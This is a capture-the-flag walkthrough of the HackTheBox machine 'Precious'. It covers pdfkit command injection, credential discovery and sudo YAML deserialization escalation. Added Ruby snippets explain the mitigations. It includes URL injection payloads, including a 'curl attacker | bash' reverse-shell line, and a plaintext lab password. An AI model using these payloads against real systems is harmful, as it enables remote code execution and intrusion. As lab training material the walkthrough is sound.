# Precious

Precious is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/Precious) created by Nauten. This machine is straightforward and has no rabbit holes or hard-to-find information, but you still need to do good research, because the exploit is a little uncommon. In this post, my IP is 10.10.14.76 and the target’s IP is 10.129.49.93.

### Gather Information

This step is always the same: ping the machine to see if it is alive, then use Nmap to scan all the ports to avoid surprises.

{% code title="Local Terminal" %}

```bash
ping -c 1 10.129.49.93
```

{% endcode %}

<figure><img src="/files/rECJgJYP19knaP2DMkXs" alt=""><figcaption><p>Ping’s output; a TTL around 64 indicates a Linux machine</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
nmap -p- --open -T5 -v -n 10.129.49.93
```

{% endcode %}

<figure><img src="/files/h5pH1cMvvuRmlYzBosRg" alt=""><figcaption><p>Nmap’s output</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
nmap -sC -sV -p 22,80 10.129.49.93
```

{% endcode %}

<figure><img src="/files/vROwPyGeO0JO6iNCREmB" alt=""><figcaption></figcaption></figure>

At this point, we know there is only a website (SSH on 22 and HTTP on 80), but we still need more details before trying anything.

{% code title="Local Terminal" %}

```bash
whatweb http://10.129.49.93
```

{% endcode %}

<figure><img src="/files/zctdoq6qUn3rA2DBD8eX" alt=""><figcaption><p>Relevant information: domain = precious.htb</p></figcaption></figure>

Add that domain to your /etc/hosts file.

* Browser: <http://10.129.49.93>

<figure><img src="/files/HmCLJUN9QqVhK3IYEzml" alt=""><figcaption><p>Website main page</p></figcaption></figure>

There is nothing special about this site. One of the best options, before interacting with the “Web Page to PDF” form, is to run wfuzz.

{% code title="Local Terminal" %}

```bash
wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.49.93/FUZZ
```

{% endcode %}

Spoiler: no results.

* Browser: submit **<http://precious.htb>**

<figure><img src="/files/AlCjXGUPlck2ut4V3uoZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3lm9c4MB5K2Qwv7RoahF" alt=""><figcaption></figcaption></figure>

OK, nothing happens with the site’s own URL. Let’s open a simple http.server with Python to see how the site reacts to it; the result does not change if you run the command without an index.html file.

{% code title="Local Terminal" %}

```bash
python3 -m http.server 80
```

{% endcode %}

* Browser submit: <http://10.10.14.76:80/>

<figure><img src="/files/hFIfGsAqVpO8RzTJuX9y" alt=""><figcaption><p>Website before submit</p></figcaption></figure>

<figure><img src="/files/YCMr9pZXrFM6ku1eZhya" alt=""><figcaption><p>Content from index.html... as a .pdf file.</p></figcaption></figure>

The output is a simple PDF file, nothing suspicious, and using only the textbox there is no way to get a response from bash commands. Let’s check the metadata.

{% code title="Local Terminal" %}

```bash
exiftool output.pdf
```

{% endcode %}

<figure><img src="/files/uSzu4qH0lF26BeIt9ZKk" alt=""><figcaption><p>output from exiftool, nothing suspicious</p></figcaption></figure>

### Weaponization and Exploitation

If you search for “pdfkit v0.8.6 exploit”, you will find a critical command injection vulnerability. We will use that to get access to the machine. (<https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795>)

<figure><img src="/files/ca1h9lM25Rb7t2W1dCuA" alt=""><figcaption><p>Exploit structure from the code, by security.snyk</p></figcaption></figure>

As we can see, we only have to change the content of **params\[:name]** in the URL to execute a command. To test whether this really works, open a local terminal and run **tcpdump -i eth0 icmp** (to check your interface, use ifconfig), then submit in the browser: `` http://10.10.14.76:80/?name=#{'%20`ping -c 1 10.10.14.76 | bash`'} ``.

After the test, we know that it works and we can create a reverse shell. For this, we need two local terminals and one index.html file with a bash command inside.

{% code title="Local Terminal 1" %}

```bash
vi index.html
python3 -m http.server 80
```

{% endcode %}

<figure><img src="/files/OIqGG3rC3oMLPt6X274I" alt=""><figcaption><p>Content of index.html</p></figcaption></figure>

{% code title="Local Terminal 2" %}

```bash
nc -nlvp 443
```

{% endcode %}

* Browser submit: `` http://10.10.14.76:80/?name=#{'%20`curl 10.10.14.76 | bash`'} ``

<figure><img src="/files/w2ObCWvB7ljaFHpf21G2" alt=""><figcaption><p>LocalTerm2, now connected as user Ruby</p></figcaption></figure>

You can close LocalTerm1; LocalTerm2 is now the target’s command prompt, referred to below as “Target”. After this, a good practice is to upgrade the shell ([bash treatment](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md)).
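The injection used above works because the vulnerable pdfkit release built its wkhtmltopdf command line as a single string that the shell parsed, so a backtick substitution inside the URL is executed on the server even though the URL is wrapped in double quotes. The Ruby below is an added example, not the page’s or pdfkit’s own code: it contrasts that shell-string pattern with two mitigations, Shellwords escaping and argv-form execution behind URL validation. The `wkhtmltopdf` command string is illustrative, `SAFE_URL` and `PAYLOAD_URL` are constructed inputs, and a child `ruby -e` process stands in for wkhtmltopdf so the block runs offline.

```ruby
require 'uri'
require 'shellwords'
require 'open3'
require 'rbconfig'

# Constructed sample inputs (not captured from the target): a normal URL
# and one shaped like the write-up's payload, with backticks in the query.
SAFE_URL    = 'http://precious.htb/'
PAYLOAD_URL = %q[http://10.10.14.76:80/?name=#{'%20`id`'}]

# Vulnerable pattern (illustrative, not pdfkit's actual source): the whole
# invocation is one string handed to /bin/sh. Double quotes do not stop the
# shell from performing `...` substitution, so `id` would run on the server.
def vulnerable_command(url)
  %(wkhtmltopdf "#{url}" -)
end

# Mitigation 1: escape each argument before building a shell string.
# Shellwords.escape backslash-protects the backticks, so the shell treats
# them as literal characters instead of a command substitution.
def shell_escaped_command(url)
  "wkhtmltopdf #{Shellwords.escape(url)} -"
end

# Mitigation 2 (preferred): never involve a shell. Validate the URL, then
# pass an argv array, which Ruby execs directly with no metacharacter parsing.
def validate_http_url(raw)
  uri = URI.parse(raw)
  unless %w[http https].include?(uri.scheme) && uri.host
    raise ArgumentError, 'only absolute http(s) URLs are accepted'
  end
  uri.to_s
rescue URI::InvalidURIError
  # Backticks, braces and spaces are not legal URI characters, so the
  # payload never reaches the command at all.
  raise ArgumentError, 'malformed URL'
end

def hardened_argv(url)
  ['wkhtmltopdf', validate_http_url(url), '-']
end

# Proof that argv-form execution passes metacharacters through verbatim:
# a child ruby process (standing in for wkhtmltopdf) prints its first
# argument unchanged. Had a shell been involved, `id` would have expanded.
def echo_via_argv(arg)
  out, _status = Open3.capture2(RbConfig.ruby, '-e', 'print ARGV[0]', arg)
  out
end

if __FILE__ == $PROGRAM_NAME
  puts vulnerable_command(PAYLOAD_URL)
  puts shell_escaped_command(PAYLOAD_URL)
  p hardened_argv(SAFE_URL)
  begin
    hardened_argv(PAYLOAD_URL)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
  puts echo_via_argv(PAYLOAD_URL)
end
```

The detection angle follows from the same mechanism: a PDF converter spawning `curl`, `bash` or `ping` as a child of the web server process is the signal, which is exactly what the tcpdump check above observes from the attacker’s side.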

<figure><img src="/files/h1z2fBGdNSei1eHW8DMu" alt=""><figcaption><p>Target folder exploration, searching for user.txt</p></figcaption></figure>

It looks like only Henry can open the user flag, so we need to gain his privileges. For that, we need to find any important file that could contain his credentials, like configs.

So, our best option at this moment is to return to /home and check whether our account, user ruby, has something in its personal folder. At first glance there is nothing there, but if you show hidden files you can see more.

{% code title="Target Terminal" %}

```bash
cd /home/
ls -l ./ruby
ls -la ./ruby
```

{% endcode %}

<figure><img src="/files/GTdj4pRF5vva7MKgYNIX" alt=""><figcaption><p>Folder ruby</p></figcaption></figure>

But there are many folders…

{% code title="Target Terminal" %}

```bash
find -name "*config*"
```

{% endcode %}

<figure><img src="/files/onVxa2ED3IzINzEEWaa0" alt=""><figcaption><p>Search for every config file inside folder ruby, usual location of credentials.</p></figcaption></figure>

{% code title="Target Terminal" %}

```bash
cat ./ruby/.bundle/config
```

{% endcode %}

<figure><img src="/files/PXO6WE4n9VJ3MUHysBfu" alt=""><figcaption><p>Content of .bundle/config file, Henry’s password.</p></figcaption></figure>

Our best option now is to open a new LocalTerm and try to log in over SSH with these credentials: `henry:Q3c1AqGHtoI0aXAYFH`

{% code title="Local Terminal" %}

```bash
ssh henry@10.129.49.93
```

{% endcode %}

<figure><img src="/files/AJqEwVDA6SQr4IZry0Ty" alt=""><figcaption><p>LocalTerm after login</p></figcaption></figure>

We are in; your LocalTerm is now **Henry**. Let’s go to his folder and open the file user.txt.

{% code title="Target Terminal - Henry" %}

```bash
cd /home/henry
cat user.txt
```

{% endcode %}

<figure><img src="/files/K0VMRaTE0ZH1jrFjwlf0" alt=""><figcaption><p>First flag acquired</p></figcaption></figure>

### Privilege Escalation

{% code title="Target Terminal - Henry" %}

```bash
cd /root/
```

{% endcode %}

<figure><img src="/files/G9fCEWBzaIF2ClqMIJq6" alt=""><figcaption></figcaption></figure>

Now we need to obtain root privileges.

{% code title="Target Terminal - Henry" %}

```bash
sudo -l
```

{% endcode %}

<figure><img src="/files/epKonOqxIZ24kdWiZ8vb" alt=""><figcaption><p>Command’s output</p></figcaption></figure>

It looks like, as Henry, we can execute that .rb file as root without a password.

{% code title="Target Terminal - Henry" %}

```bash
cat /opt/update_dependencies.rb
```

{% endcode %}

<figure><img src="/files/lmLZoE3g19CiF4yAdxeT" alt=""><figcaption><p>Code of “update_dependencies.rb”</p></figcaption></figure>

At first glance, we can see that it reads a file called “dependencies.yml”; we can use that to our advantage.

{% code title="Target Terminal - Henry" %}

```bash
find -name "dependencies.yml"
cat ./sample/dependencies.yml
```

{% endcode %}

<figure><img src="/files/VAxSj8EFw4QHu35oiV8G" alt=""><figcaption></figcaption></figure>

Nothing important in the content, but there is an exploit technique called **YAML deserialization** (it took me a lot of time to find it) that can be used here, by creating a new dependencies.yml file with [this code](https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml). Remember to create the new dependencies.yml in Henry’s folder, because that is where you have write permission.

<figure><img src="/files/LJsvLb3WsKxPDbowxkE2" alt=""><figcaption><p>New dependencies.yml’s code</p></figcaption></figure>

{% code title="Target Terminal - Henry" %}

```bash
sudo /usr/bin/ruby /opt/update_dependencies.rb
```

{% endcode %}

Now we have to make one modification to the dependencies.yml file and then run the previous command again.

<figure><img src="/files/PseC86dHR8NFxjOWX0Ax" alt=""><figcaption><p>Location of the modification</p></figcaption></figure>

{% code title="Target Terminal - Henry" %}

```bash
sudo /usr/bin/ruby /opt/update_dependencies.rb
/bin/bash -p
```

{% endcode %}

After executing the command again, we change from Henry to **root**; now we have permission to read the /root/ folder.
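The escalation above is possible because `update_dependencies.rb` evidently parses a file the low-privileged user can write with an unrestricted Ruby YAML loader, and Psych honours a `!ruby/object:` tag by instantiating whatever class the document names. The Ruby below is an added example, not the machine’s script or the linked gist: `DependencyPin`, `BENIGN_YAML` and `TAGGED_YAML` are constructed for illustration, and the tagged document names a harmless class only to show that the tag is obeyed. The defensive fix is `YAML.safe_load`, which builds only core types and rejects every other tag; on Psych 4 (Ruby 3.1 and later) `YAML.load` already behaves that way and `YAML.unsafe_load` is the explicit opt-in.

```ruby
require 'yaml'

# A class that exists in the application. With an unrestricted loader a
# YAML document can name it in a tag, and Psych will allocate it and fill
# its instance variables from the mapping without DependencyPin.new ever
# being called by the program.
class DependencyPin
  attr_accessor :name, :version
end

# Constructed sample: the legitimate shape of a dependency list.
BENIGN_YAML = <<~YAML
  dependencies:
    pdfkit: 0.8.6
    rails: 6.1
YAML

# Constructed sample: a document that smuggles a type tag. Real gadget
# chains name classes whose initialisation has side effects; this one
# only demonstrates that the loader obeys the tag.
TAGGED_YAML = <<~YAML
  --- !ruby/object:DependencyPin
  name: injected
  version: 0.0.0
YAML

# Unrestricted load: YAML.load on Psych < 4 (the behaviour the target's
# script relied on), YAML.unsafe_load on newer Psych where load is safe.
def unrestricted_load(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Hardened: safe_load only constructs String, Integer, Float, Hash, Array
# and a few other core types, and raises Psych::DisallowedClass for any
# tag outside the (here empty) allowlist.
def load_dependencies_safely(text)
  YAML.safe_load(text, permitted_classes: [], aliases: false)
end

# Name of the class the chosen loader built from the document, or
# :rejected when the loader refused the tag.
def class_built_by(loader, text)
  send(loader, text).class.name
rescue Psych::DisallowedClass
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  p load_dependencies_safely(BENIGN_YAML)
  p class_built_by(:unrestricted_load, TAGGED_YAML)
  p class_built_by(:load_dependencies_safely, TAGGED_YAML)
end
```

The other half of the fix is the file location: a script run through sudo should read its configuration from a fixed, root-owned path rather than a name resolved against the caller’s working directory, since that is what let Henry supply his own dependencies.yml.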

{% code title="Target Root" %}

```bash
cd /root/
```

{% endcode %}

{% code title="Target Root" %}

```bash
cat root.txt
```

{% endcode %}

<figure><img src="/files/wAOcJ0w9qHu212FJYk1y" alt=""><figcaption><p>System flag</p></figcaption></figure>
